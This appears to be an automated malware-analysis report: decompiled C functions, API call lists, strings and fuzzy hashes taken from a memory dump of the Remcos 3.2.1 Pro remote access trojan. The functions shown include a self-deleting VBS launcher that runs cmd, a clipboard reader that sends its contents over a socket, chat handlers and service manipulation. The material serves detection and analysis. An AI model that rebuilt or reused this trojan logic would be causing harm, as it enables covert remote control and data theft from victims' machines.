                      				E00744429(_t79,  &_v100, E007430A6(_t79,  &_v76, E0074427F(_t79,  &_v52, E0077987F(_t79,  &_v76, _t140, L"Temp")), 0, _t140, "\\"), _t140,  &_v124);
                      				E00741EF0();
                      				E00741EF0();
                      				E00741F6D(_t79,  &_v28);
                      				_t54 = E0074427F(_t79,  &_v196, L"\"\"\", 0");
                      				E00743311(E007430A6(_t79,  &_v76, E00743030( &_v52, E007430A6(_t79,  &_v148, E0074427F(_t79,  &_v172, L"CreateObject(\"WScript.Shell\").Run \"cmd /c \"\""), 0, _t140,  &_v716), _t54), 0, _t140, "\n"));
                      				E00741EF0();
                      				E00741EF0();
                      				E00741EF0();
                      				E00741EF0();
                      				E00741EF0();
                      				E0074766C(_t79,  &_v28, 0, L"CreateObject(\"Scripting.FileSystemObject\").DeleteFile(Wscript.ScriptFullName)");
                      				_t67 = E00741EEB( &_v100);
                      				_t68 = E00742489();
                      				if(E00757947(E00741EEB( &_v28), _t68 + _t68, _t67, 0) != 0 && ShellExecuteW(0, L"open", E00741EEB( &_v100), 0x79f724, 0x79f724, 0) > 0x20) {
                      					ExitProcess(0);
                      				}
                      				E00741EF0();
                      				E00741EF0();
                      				return E00741EF0();
                      			}

                      APIs
                        • Part of subcall function 0075015B: TerminateProcess.KERNEL32(00000000,?,0074AD95), ref: 0075016B
                        • Part of subcall function 0075015B: WaitForSingleObject.KERNEL32(000000FF,?,0074AD95), ref: 0075017E
                        • Part of subcall function 00750A30: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,00000000,origmsc), ref: 00750A4C
                        • Part of subcall function 00750A30: RegQueryValueExA.ADVAPI32(00000000,00000000,00000000,00000000,000003E8,?), ref: 00750A65
                        • Part of subcall function 00750A30: RegCloseKey.ADVAPI32(00000000), ref: 00750A70
                      • GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 0074B4E2
                      • ShellExecuteW.SHELL32(00000000,open,00000000,0079F724,0079F724,00000000), ref: 0074B641
                      • ExitProcess.KERNEL32 ref: 0074B64D
                      Strings
                      Memory Dump Source
                      • Source File: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: true
• Associated: 0000001C.00000002.416426538.00000000007AF000.00000040.00000001.sdmp
                      Yara matches
                      Similarity
                      • API ID: Process$CloseExecuteExitFileModuleNameObjectOpenQueryShellSingleTerminateValueWait
                      • String ID: """, 0$.vbs$CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)$CreateObject("WScript.Shell").Run "cmd /c ""$Temp$exepath$open
                      • API String ID: 1913171305-2411266221
                      • Opcode ID: 3252ce8c74bea82780b547e10ce752fee7ab40b562e6a34ce909f19e2c909a3e
                      • Instruction ID: 66677b3997cb06abb00cbd2a065e4307ff38d373dc3c7b870db01d1a386e06ef
                      • Opcode Fuzzy Hash: 3252ce8c74bea82780b547e10ce752fee7ab40b562e6a34ce909f19e2c909a3e
                      • Instruction Fuzzy Hash: B4417971910118EBCB14F7A4DC5ADFE777ABF61741F804129F906A3192EF285E8ACA90
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 100%
                      			E0077558A(void* __edx, void* __eflags, char* _a4, int _a8, char* _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
                      				int _v8;
                      				int _v12;
                      				char _v16;
                      				intOrPtr _v24;
                      				char _v28;
                      				void* __ebx;
                      				char* _t31;
                      				int _t35;
                      				int _t43;
                      				void* _t51;
                      				int _t52;
                      				int _t54;
                      				void* _t56;
                      				void* _t63;
                      				short* _t64;
                      				short* _t67;
                      
                      				_t62 = __edx;
                      				E00775507(_t51,  &_v28, __edx, _a24);
                      				_t52 = 0;
                      				_t54 =  *(_v24 + 0x14);
                      				_t31 = _a4;
                      				_v8 = _t54;
                      				if(_t31 == 0) {
                      					L4:
                      					 *((intOrPtr*)(E0077A504())) = 0x16;
                      					E0077695D();
                      					L18:
                      					if(_v16 != 0) {
                      						 *(_v28 + 0x350) =  *(_v28 + 0x350) & 0xfffffffd;
                      					}
                      					return _t52;
                      				}
                      				_t66 = _a8;
                      				if(_a8 == 0) {
                      					goto L4;
                      				}
                      				 *_t31 = 0;
                      				if(_a12 == 0 || _a16 == 0) {
                      					goto L4;
                      				} else {
                      					_t35 = MultiByteToWideChar(_t54, 0, _a12, 0xffffffff, 0, 0);
                      					_v12 = _t35;
                      					if(_t35 != 0) {
                      						_t64 = E0077F98C(_t54, _t35 + _t35);
                      						_t56 = _t63;
                      						if(_t64 != 0) {
                      							if(MultiByteToWideChar(_v8, 0, _a12, 0xffffffff, _t64, _v12) != 0) {
                      								_t67 = E0077F98C(_t56, _t66 + _t66);
                      								if(_t67 != 0) {
                      									_t43 = E00781453(0, _t62, _t67, _a8, _t64, _a16, _a20, _a24);
                      									_v12 = _t43;
                      									if(_t43 != 0) {
                      										if(WideCharToMultiByte(_v8, 0, _t67, 0xffffffff, _a4, _a8, 0, 0) != 0) {
                      											_t52 = _v12;
                      										} else {
                      											E0077A4CE(GetLastError());
                      										}
                      									}
                      								}
                      								E007801F5(_t67);
                      							} else {
                      								E0077A4CE(GetLastError());
                      							}
                      						}
                      						E007801F5(_t64);
                      					} else {
                      						E0077A4CE(GetLastError());
                      					}
                      					goto L18;
                      				}
                      			}

                      APIs
                      • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00741D39,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 007755E2
                      • GetLastError.KERNEL32(?,?,00741D39,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 007755EF
                      • __dosmaperr.LIBCMT ref: 007755F6
                      • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00741D39,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 00775622
                      • GetLastError.KERNEL32(?,?,?,00741D39,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0077562C
                      • __dosmaperr.LIBCMT ref: 00775633
                      • WideCharToMultiByte.KERNEL32(?,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,?,?,?,?,?,00741D39,?), ref: 00775676
                      • GetLastError.KERNEL32(?,?,?,?,?,?,00741D39,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 00775680
                      • __dosmaperr.LIBCMT ref: 00775687
                      • _free.LIBCMT ref: 00775693
                      • _free.LIBCMT ref: 0077569A
                      Memory Dump Source
                      • Source File: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: true
• Associated: 0000001C.00000002.416426538.00000000007AF000.00000040.00000001.sdmp
                      Yara matches
                      Similarity
                      • API ID: ByteCharErrorLastMultiWide__dosmaperr$_free
                      • String ID:
                      • API String ID: 2441525078-0
                      • Opcode ID: 83e8bc9a546910f608c8ee27c86bb48e763528b50b1053e41a9a97e8d0bb01b6
                      • Instruction ID: f43593e09804b71c7b8cc12a6bfe1468eb91dccd7f0e6fca4bdf9b743bdd3093
                      • Opcode Fuzzy Hash: 83e8bc9a546910f608c8ee27c86bb48e763528b50b1053e41a9a97e8d0bb01b6
                      • Instruction Fuzzy Hash: 1E31BF7280064AFFDF11AFA4CC49CAF7B79AF047A0B10C159F91896190DB79CD21DBA1
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 76%
                      			E007453ED(char* __edx, void* __eflags, intOrPtr _a4) {
                      				struct tagMSG _v52;
                      				void* _v56;
                      				char _v60;
                      				char _v76;
                      				char _v80;
                      				char _v84;
                      				char _v104;
                      				char _v108;
                      				void* _v112;
                      				char _v116;
                      				char _v120;
                      				char _v140;
                      				void* _v176;
                      				void* __ebx;
                      				void* __ebp;
                      				intOrPtr* _t28;
                      				char* _t36;
                      				intOrPtr _t45;
                      				intOrPtr _t46;
                      				void* _t57;
                      				intOrPtr _t69;
                      				void* _t111;
                      				void* _t113;
                      				void* _t115;
                      				signed int _t117;
                      				void* _t120;
                      				void* _t121;
                      				void* _t122;
                      				void* _t123;
                      
                      				_t125 = __eflags;
                      				_t101 = __edx;
                      				_t69 = _a4;
                      				E007420EC(_t69,  &_v104, __edx, __eflags, _t69 + 0x1c);
                      				SetEvent( *(_t69 + 0x34));
                      				_t28 = E00741F95( &_v108);
                      				E007442A6( &_v108,  &_v60, 4, 0xffffffff);
                      				_t120 = (_t117 & 0xfffffff8) - 0x5c;
                      				E007420EC(_t69, _t120, _t101, _t125, 0x7ac238);
                      				_t121 = _t120 - 0x18;
                      				E007420EC(_t69, _t121, _t101, _t125,  &_v76);
                      				E00757478( &_v140, _t101);
                      				_t122 = _t121 + 0x30;
                      				_t111 =  *_t28 - 0x3a;
                      				if(_t111 == 0) {
                      					E00741E49( &_v116, _t101, __eflags, 0);
                      					_t36 = E00742489();
                      					E00741F95(E00741E49( &_v120, _t101, __eflags, 0));
                      					_t101 = _t36;
                      					_t113 = E0074F69B();
                      					__eflags = _t113;
                      					if(_t113 == 0) {
                      						L7:
                      						E00741E74( &_v116, _t101);
                      						E00741FC7();
                      						E00741FC7();
                      						__eflags = 0;
                      						return 0;
                      					}
                      					 *0x7abaec = E0074F931(_t113, "DisplayMessage");
                      					_t45 = E0074F931(_t113, "GetMessage");
                      					_t104 = "CloseChat";
                      					 *0x7abae4 = _t45;
                      					_t46 = E0074F931(_t113, "CloseChat");
                      					_t123 = _t122 - 0x18;
                      					 *0x7abae8 = _t46;
                      					 *0x7abae1 = 1;
                      					E007420EC(_t69, _t123, "CloseChat", __eflags, 0x7ac2b8);
                      					_push(0x74);
                      					E00744AA4(_t69, _t69, _t104, __eflags);
                      					L10:
                      					_t115 = HeapCreate(0, 0, 0);
                      					__eflags =  *0x7abae4(_t115,  &_v140);
                      					if(__eflags != 0) {
                      						_t123 = _t123 - 0x18;
                      						E007420AB(_t69, _t123, _t104, __eflags, _v140, _t51);
                      						_push(0x3b);
                      						E00744AA4(_t69, _t69, _t104, __eflags);
                      						HeapFree(_t115, 0, _v176);
                      					}
                      					goto L10;
                      				}
                      				_t127 = _t111 != 1;
                      				if(_t111 != 1) {
                      					goto L7;
                      				}
                      				_t57 =  *0x7abaec(E00741F95(E00741E49( &_v116, _t101, _t127, 0)));
                      				_t128 = _t57;
                      				if(_t57 == 0) {
                      					goto L7;
                      				}
                      				E0074427F(_t69,  &_v80, 0x79f6b8);
                      				_t101 =  &_v84;
                      				E0075739C(_t69, _t122 - 0x18,  &_v84);
                      				_push(0x3b);
                      				E00744AA4(_t69, _t69,  &_v84, _t128);
                      				E00741EF0();
                      				L4:
                      				while(GetMessageA( &_v52, 0, 0, 0) > 0) {
                      					TranslateMessage( &_v52);
                      					DispatchMessageA( &_v52);
                      				}
                      				if(__eflags < 0) {
                      					goto L4;
                      				}
                      				goto L7;
                      			}

                      APIs
                      • SetEvent.KERNEL32(?,?), ref: 0074540C
                      • GetMessageA.USER32 ref: 007454BC
                      • TranslateMessage.USER32(?), ref: 007454CB
                      • DispatchMessageA.USER32 ref: 007454D6
                      • HeapCreate.KERNEL32(00000000,00000000,00000000,00000074,007AC2B8), ref: 0074558E
                      • HeapFree.KERNEL32(00000000,00000000,0000003B,0000003B,?,00000000), ref: 007455C6
                        • Part of subcall function 00744AA4: send.WS2_32(?,00000000,00000000,00000000), ref: 00744B18
                      Strings
                      Memory Dump Source
                      • Source File: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: true
                      • Associated: 0000001C.00000002.416426538.00000000007AF000.00000040.00000001.sdmp
                      Yara matches
                      Similarity
                      • API ID: Message$Heap$CreateDispatchEventFreeTranslatesend
                      • String ID: CloseChat$DisplayMessage$GetMessage
                      • API String ID: 2956720200-749203953
                      • Opcode ID: f4aa6ec60cf0a7050440c713b6573a011b688568a1717dd495a66b3f994fba05
                      • Instruction ID: df117e2f1a63be28868efb29cd52f71b97d6ed272484b473b32bf425609d30ac
                      • Opcode Fuzzy Hash: f4aa6ec60cf0a7050440c713b6573a011b688568a1717dd495a66b3f994fba05
                      • Instruction Fuzzy Hash: 3341A371604310EBCB14FB74DC4E96F7BA9AF86710B80492DF911975A2EF3C9A0AC791
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 84%
                      			E0075805B(void* __ecx, void* __edx, intOrPtr _a4) {
                      				char _v524;
                      				char _v544;
                      				char _v560;
                      				char _v572;
                      				void* _v576;
                      				char _v580;
                      				char _v584;
                      				char _v600;
                      				char _v608;
                      				char _v616;
                      				char _v620;
                      				void* _v624;
                      				char _v628;
                      				char _v632;
                      				char _v636;
                      				char _v644;
                      				void* _v648;
                      				char _v652;
                      				void* _v672;
                      				void* __ebx;
                      				signed int _t36;
                      				void* _t39;
                      				void* _t40;
                      				void* _t77;
                      
                      				_t73 = __edx;
                      				_t77 = __ecx;
                      				_t54 = __edx;
                      				E00741F6D(__edx,  &_v644);
                      				_t36 = __edx + 0xffffffd0;
                      				_t85 = _t36 - 7;
                      				if(_t36 <= 7) {
                      					switch( *((intOrPtr*)(_t36 * 4 +  &M00758237))) {
                      						case 0:
                      							_push(L"Temp");
                      							goto L14;
                      						case 1:
                      							__ecx =  &_v620;
                      							__eax = E00756D45(__ebx,  &_v620);
                      							__ecx =  &_v644;
                      							__eax = E00741EFA( &_v644, __edx, __esi, __eax);
                      							goto L4;
                      						case 2:
                      							_push(L"SystemDrive");
                      							goto L14;
                      						case 3:
                      							_push(L"WinDir");
                      							goto L14;
                      						case 4:
                      							__eax = E00757614(__ecx);
                      							__eflags = __al;
                      							if(__eflags != 0) {
                      								__ecx =  &_v620;
                      								E0074427F(__ebx, __ecx, L"\\SysWOW64") = E0077987F(__ebx, __ecx, __eflags, L"WinDir");
                      								__ecx =  &_v600;
                      								__edx = __eax;
                      								__ecx =  &_v580;
                      								__eax = E00743030( &_v580, __edx, __eax);
                      								__ecx =  &_v652;
                      								__eax = E00741EFA( &_v652, __edx, __esi, __eax);
                      								__ecx =  &_v584;
                      								__eax = E00741EF0();
                      								__ecx =  &_v608;
                      								__eax = E00741EF0();
                      								L4:
                      								__ecx =  &_v620;
                      								goto L5;
                      							} else {
                      								__ecx =  &_v572;
                      								E0074427F(__ebx, __ecx, L"\\system32") = E0077987F(__ebx, __ecx, __eflags, L"WinDir");
                      								__ecx =  &_v600;
                      								__edx = __eax;
                      								__ecx =  &_v628;
                      								__eax = E00743030( &_v628, __edx, __eax);
                      								__ecx =  &_v652;
                      								__eax = E00741EFA( &_v652, __edx, __esi, __eax);
                      								__ecx =  &_v632;
                      								__eax = E00741EF0();
                      								__ecx =  &_v608;
                      								__eax = E00741EF0();
                      								__ecx =  &_v584;
                      								L5:
                      								__eax = E00741EF0();
                      								goto L15;
                      							}
                      							L16:
                      						case 5:
                      							_push(L"ProgramFiles");
                      							goto L14;
                      						case 6:
                      							_push(L"AppData");
                      							goto L14;
                      						case 7:
                      							_push(L"UserProfile");
                      							L14:
                      							E00749DC9(_t54,  &_v644, E0077987F(_t54, _t57, _t85));
                      							goto L15;
                      					}
                      				}
                      				L15:
                      				__imp__GetLongPathNameW(E00741EEB( &_v644),  &_v524, 0x208);
                      				_t39 = E0074427F(_t54,  &_v560, _a4);
                      				_t40 = E0074427F(_t54,  &_v636, "\\");
                      				E00743030(_t77, E00743030( &_v600, E007583F4(_t54,  &_v616, _t73, _t85,  &_v544, _t38), _t40), _t39);
                      				E00741EF0();
                      				E00741EF0();
                      				E00741EF0();
                      				E00741EF0();
                      				E00741EF0();
                      				return _t77;
                      				goto L16;
                      			}

                      APIs
                      • GetLongPathNameW.KERNEL32(00000000,?,00000208), ref: 007581B2
                      Strings
                      Memory Dump Source
                      • Source File: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: true
                      • Associated: 0000001C.00000002.416426538.00000000007AF000.00000040.00000001.sdmp
                      Yara matches
                      Similarity
                      • API ID: LongNamePath
                      • String ID: AppData$ProgramFiles$SystemDrive$Temp$UserProfile$WinDir$\SysWOW64$\system32
                      • API String ID: 82841172-1609423294
                      • Opcode ID: 98c614025c90c7fc443099da338e4ade26b57fa8b3865efdd20b9ac9adee37cc
                      • Instruction ID: 806f327bef95d3f43fb6b30b7f51b03a5efe6d2eb7c40b5705167f87a0742027
                      • Opcode Fuzzy Hash: 98c614025c90c7fc443099da338e4ade26b57fa8b3865efdd20b9ac9adee37cc
                      • Instruction Fuzzy Hash: 07418871108240EBD604F760DC5A8FF73A9BEA1751F900A2DFD46520E1EFAC9A4EC663
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 59%
                      			E00758F59(void* __ebx, void* __ecx, void* __edx) {
                      				char _v204;
                      				void* __edi;
                      				struct HWND__* _t17;
                      				void _t22;
                      				intOrPtr _t24;
                      				intOrPtr _t25;
                      				void _t26;
                      				void _t28;
                      				void* _t30;
                      				void* _t34;
                      				signed int _t37;
                      				void* _t45;
                      				void* _t47;
                      				void* _t51;
                      				void* _t53;
                      				void* _t55;
                      				void* _t59;
                      
                      				_t36 = __ecx;
                      				_t34 = __ecx;
                      				AllocConsole();
                      				_t17 =  *0x7aca84(__ebx);
                      				 *0x7abebc = _t17;
                      				if(_t34 == 0) {
                      					ShowWindow(_t17, 0);
                      				}
                      				_push(_t45);
                      				E0077BCA5(_t36, "CONOUT$", "a", E00776A85(1));
                      				E00771F00(_t45,  &_v204, 0, 0xc8);
                      				_t47 =  &_v204 - 1;
                      				do {
                      					_t22 =  *(_t47 + 1);
                      					_t47 = _t47 + 1;
                      				} while (_t22 != 0);
                      				_t37 = 7;
                      				memcpy(_t47, "--------------------------\n", _t37 << 2);
                      				_t51 =  &_v204 - 1;
                      				do {
                      					_t24 =  *((intOrPtr*)(_t51 + 1));
                      					_t51 = _t51 + 1;
                      				} while (_t24 != 0);
                      				asm("movsd");
                      				asm("movsd");
                      				asm("movsd");
                      				_t53 =  &_v204 - 1;
                      				do {
                      					_t25 =  *((intOrPtr*)(_t53 + 1));
                      					_t53 = _t53 + 1;
                      				} while (_t25 != 0);
                      				asm("movsd");
                      				asm("movsd");
                      				asm("movsw");
                      				_t55 =  &_v204 - 1;
                      				do {
                      					_t26 =  *(_t55 + 1);
                      					_t55 = _t55 + 1;
                      				} while (_t26 != 0);
                      				_push(6);
                      				memcpy(_t55, "\n * BreakingSecurity.net\n", 0 << 2);
                      				asm("movsw");
                      				_t59 =  &_v204 - 1;
                      				do {
                      					_t28 =  *(_t59 + 1);
                      					_t59 = _t59 + 1;
                      					_t85 = _t28;
                      				} while (_t28 != 0);
                      				_t30 = memcpy(_t59, "--------------------------\n\n", 0 << 2);
                      				asm("movsb");
                      				return E0074482E(_t85, _t30, 7);
                      			}

                      APIs
                      • AllocConsole.KERNEL32(00000001), ref: 00758F65
                      • GetConsoleWindow.KERNEL32 ref: 00758F6B
                      • ShowWindow.USER32(00000000,00000000), ref: 00758F7E
                      Strings
                      Memory Dump Source
                      • Source File: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: true
                      • Associated: 0000001C.00000002.416426538.00000000007AF000.00000040.00000001.sdmp
                      Yara matches
                      Similarity
                      • API ID: ConsoleWindow$AllocShow
                      • String ID: * BreakingSecurity.net$ * Remcos v$--------------------------$--------------------------$3.2.1 Pro$CONOUT$
                      • API String ID: 3461962499-1433448479
                      • Opcode ID: 89476c64cffe448917f1c7e56cdc3a6ccbae30f81b9509b020e571c75b1ad6cf
                      • Instruction ID: 3af1c489d707b73685798dc6c40d9ed80238ea921f5db16d3f23c821326c170f
                      • Opcode Fuzzy Hash: 89476c64cffe448917f1c7e56cdc3a6ccbae30f81b9509b020e571c75b1ad6cf
                      • Instruction Fuzzy Hash: A7212B32908A056AEF619F145C05FD5B75AAF93710F408791ED4C7B181CBEA2D8A47B4
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 80%
                      			E00752D6D(void* __ebp, char _a16, char _a32, char _a36, void* _a128, void* _a152) {
                      				void* __ebx;
                      				void* _t16;
                      				struct HWND__* _t23;
                      				void* _t38;
                      				void* _t41;
                      
                      				if(OpenClipboard(_t23) != 0) {
                      					EmptyClipboard();
                      					CloseClipboard();
                      					if(OpenClipboard(_t23) != 0) {
                      						_t38 = GetClipboardData(0xd);
                      						_t16 = GlobalLock(_t38);
                      						GlobalUnlock(_t38);
                      						CloseClipboard();
                      						_t29 =  !=  ? _t16 : 0x79f724;
                      						E0074427F(_t23,  &_a36,  !=  ? _t16 : 0x79f724);
                      						_t34 =  &_a32;
                      						E0075739C(_t23, _t41 - 0x18,  &_a32);
                      						_push(0x6b);
                      						E00744AA4(_t23, 0x7ac780,  &_a32, _t16);
                      						E00741EF0();
                      					}
                      				}
                      				_t4 =  &_a16; // 0x744538
                      				E00741E74(_t4, _t34);
                      				E00741FC7();
                      				E00741FC7();
                      				return 0;
                      			}

                      APIs
                      • OpenClipboard.USER32 ref: 00752D6E
                      • EmptyClipboard.USER32 ref: 00752D7C
                      • CloseClipboard.USER32 ref: 00752D82
                      • OpenClipboard.USER32 ref: 00752D89
                      • GetClipboardData.USER32 ref: 00752D99
                      • GlobalLock.KERNEL32 ref: 00752DA2
                      • GlobalUnlock.KERNEL32(00000000), ref: 00752DAB
                      • CloseClipboard.USER32 ref: 00752DB1
                        • Part of subcall function 00744AA4: send.WS2_32(?,00000000,00000000,00000000), ref: 00744B18
                      Strings
                      Memory Dump Source
                      • Source File: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: true
                      • Associated: 0000001C.00000002.416426538.00000000007AF000.00000040.00000001.sdmp
                      Yara matches
                      Similarity
                      • API ID: Clipboard$CloseGlobalOpen$DataEmptyLockUnlocksend
                      • String ID: 8Et
                      • API String ID: 2172192267-257909599
                      • Opcode ID: 6c292a4a321165ca2df9863e246caabad48da9c627e6933c3d19ccea4f5d3496
                      • Instruction ID: 44e13c104b14071912ddf07a66b65c65a2c7c1ed9867f43eb8593863526c6ccc
                      • Opcode Fuzzy Hash: 6c292a4a321165ca2df9863e246caabad48da9c627e6933c3d19ccea4f5d3496
                      • Instruction Fuzzy Hash: 6C015231244600DFC304BB71DC4EAAEB7A5BF95342F40492EF916C51B1DF7C8A4AC655
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 93%
                      			E00756472(char _a4) {
                      				intOrPtr _v28;
                      				struct _SERVICE_STATUS _v32;
                      				int _t22;
                      				void* _t26;
                      				void* _t27;
                      
                      				_t22 = 0;
                      				_t27 = OpenSCManagerW(0, 0, 0x11);
                      				_t26 = OpenServiceW(_t27, E00741EEB( &_a4), 0xf003f);
                      				if(_t26 != 0) {
                      					if(ControlService(_t26, 1,  &_v32) != 0) {
                      						do {
                      							QueryServiceStatus(_t26,  &_v32);
                      						} while (_v28 != 1);
                      						StartServiceW(_t26, 0, 0);
                      						asm("sbb ebx, ebx");
                      						_t22 = 3;
                      						CloseServiceHandle(_t27);
                      						CloseServiceHandle(_t26);
                      					} else {
                      						CloseServiceHandle(_t27);
                      						CloseServiceHandle(_t26);
                      						_t22 = 2;
                      					}
                      				} else {
                      					CloseServiceHandle(_t27);
                      				}
                      				E00741EF0();
                      				return _t22;
                      			}

                      APIs
                      • OpenSCManagerW.ADVAPI32(00000000,00000000,00000011,00000000,00000001,?,?,?,?,?,?,00755E19,00000000), ref: 00756481
                      • OpenServiceW.ADVAPI32(00000000,00000000,000F003F,?,?,?,?,?,?,00755E19,00000000), ref: 00756498
                      • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00755E19,00000000), ref: 007564A5
                      • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,00755E19,00000000), ref: 007564B4
                      • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00755E19,00000000), ref: 007564C5
                      • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00755E19,00000000), ref: 007564C8
                      Memory Dump Source
                      • Source File: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: true
                      • Associated: 0000001C.00000002.416426538.00000000007AF000.00000040.00000001.sdmp
                      Yara matches
                      Similarity
                      • API ID: Service$CloseHandle$Open$ControlManager
                      • String ID:
                      • API String ID: 221034970-0
                      • Opcode ID: d2e7c1f3d8a70cbfc4c55ad053db67afe9575c8f361b6dbef6acfffdf24e1861
                      • Instruction ID: f3b5997eeba04f5b2010ecf829260b6a3347b1418cdf6f12d0d90b7cb35d1b9c
                      • Opcode Fuzzy Hash: d2e7c1f3d8a70cbfc4c55ad053db67afe9575c8f361b6dbef6acfffdf24e1861
                      • Instruction Fuzzy Hash: 75118231940118BB9610ABA89C89DFF7B7EDB467627408016FD0593150EB6C4E4BDAA5
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 100%
                      			E00781BEE(char _a4) {
                      				char _v8;
                      
                      				_t26 = _a4;
                      				_t52 =  *_a4;
                      				if( *_a4 != 0x797208) {
                      					E007801F5(_t52);
                      					_t26 = _a4;
                      				}
                      				E007801F5( *((intOrPtr*)(_t26 + 0x3c)));
                      				E007801F5( *((intOrPtr*)(_a4 + 0x30)));
                      				E007801F5( *((intOrPtr*)(_a4 + 0x34)));
                      				E007801F5( *((intOrPtr*)(_a4 + 0x38)));
                      				E007801F5( *((intOrPtr*)(_a4 + 0x28)));
                      				E007801F5( *((intOrPtr*)(_a4 + 0x2c)));
                      				E007801F5( *((intOrPtr*)(_a4 + 0x40)));
                      				E007801F5( *((intOrPtr*)(_a4 + 0x44)));
                      				E007801F5( *((intOrPtr*)(_a4 + 0x360)));
                      				_v8 =  &_a4;
                      				E00781AB4(5,  &_v8);
                      				_v8 =  &_a4;
                      				return E00781B04(4,  &_v8);
                      			}

                      APIs
                      • _free.LIBCMT ref: 00781C02
                        • Part of subcall function 007801F5: HeapFree.KERNEL32(00000000,00000000,?,00788EEF,?,00000000,?,00000000,?,00789193,?,00000007,?,?,007896DE,?), ref: 0078020B
                        • Part of subcall function 007801F5: GetLastError.KERNEL32(?,?,00788EEF,?,00000000,?,00000000,?,00789193,?,00000007,?,?,007896DE,?,?), ref: 0078021D
                      • _free.LIBCMT ref: 00781C0E
                      • _free.LIBCMT ref: 00781C19
                      • _free.LIBCMT ref: 00781C24
                      • _free.LIBCMT ref: 00781C2F
                      • _free.LIBCMT ref: 00781C3A
                      • _free.LIBCMT ref: 00781C45
                      • _free.LIBCMT ref: 00781C50
                      • _free.LIBCMT ref: 00781C5B
                      • _free.LIBCMT ref: 00781C69
                      Memory Dump Source
                      • Source File: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: true
                      • Associated: 0000001C.00000002.416426538.00000000007AF000.00000040.00000001.sdmp
                      Yara matches
                      Similarity
                      • API ID: _free$ErrorFreeHeapLast
                      • String ID:
                      • API String ID: 776569668-0
                      • Opcode ID: f067e8bb6705fba5091477ec3c8bab34c4f64a7de453869e50501fa373c50e7b
                      • Instruction ID: c10f34aa6db1a5c92c404ed4da808a0c416de8724042786e4bea3e0b72b991cb
                      • Opcode Fuzzy Hash: f067e8bb6705fba5091477ec3c8bab34c4f64a7de453869e50501fa373c50e7b
                      • Instruction Fuzzy Hash: B611937699014CFFCB41FF98CC4ACDD3BA9FF05360B4141A5BB088B222DA35DA549B80
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 84%
                      			E007523B9(void* __ebx, CHAR* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
                      				char _v116;
                      				char _v120;
                      				char _v140;
                      				char _v156;
                      				char _v164;
                      				void* _v172;
                      				char _v192;
                      				void* _v196;
                      				char _v212;
                      				char _v216;
                      				void* _v220;
                      				char _v240;
                      				void* _v244;
                      				char _v252;
                      				char _v264;
                      				void* _v268;
                      				void* _v284;
                      				char _v288;
                      				void* _v292;
                      				char _v304;
                      				char _v308;
                      				char _v312;
                      				char _v336;
                      				char _v340;
                      				char _v344;
                      				char _v348;
                      				char _v364;
                      				char _v368;
                      				long _v372;
                      				int _v376;
                      				char _v396;
                      				char _v400;
                      				void* _v404;
                      				int _v408;
                      				char _v412;
                      				char _v416;
                      				char _v420;
                      				char _v424;
                      				char _v428;
                      				char _v432;
                      				char _v436;
                      				char _v440;
                      				char _v444;
                      				char _v452;
                      				char _v500;
                      				char _v504;
                      				void* _t194;
                      				void* _t196;
                      				intOrPtr _t324;
                      				intOrPtr _t325;
                      				void* _t326;
                      				void* _t328;
                      				signed int _t329;
                      				signed int _t333;
                      				void* _t336;
                      				void* _t337;
                      				void* _t338;
                      				void* _t342;
                      				void* _t348;
                      
                      				_t347 = __eflags;
                      				_t310 = __edx;
                      				_t244 = __ebx;
                      				_push(__ebx);
                      				_t324 = _a4;
                      				E007420EC(__ebx,  &_v308, __edx, __eflags, _t324 + 0x1c);
                      				SetEvent( *(_t324 + 0x34));
                      				_t325 =  *((intOrPtr*)(E00741F95( &_v312)));
                      				E007442A6( &_v312,  &_v288, 4, 0xffffffff);
                      				_t336 = (_t333 & 0xfffffff8) - 0x18c;
                      				E007420EC(__ebx, _t336, _t310, _t347, 0x7ac238);
                      				_t337 = _t336 - 0x18;
                      				E007420EC(__ebx, _t337, _t310, _t347,  &_v304);
                      				E00757478( &_v444, _t310);
                      				_t338 = _t337 + 0x30;
                      				_t348 = _t325 - 0x8f;
                      				if(_t348 > 0) {
                      					_t326 = _t325 + 0xffffff70;
                      					__eflags = _t326 - 0x22;
                      					if(__eflags <= 0) {
                      						switch( *((intOrPtr*)(( *(_t326 + 0x753511) & 0x000000ff) * 4 +  &M007534C5))) {
                      							case 0:
                      								__ecx =  &_v420;
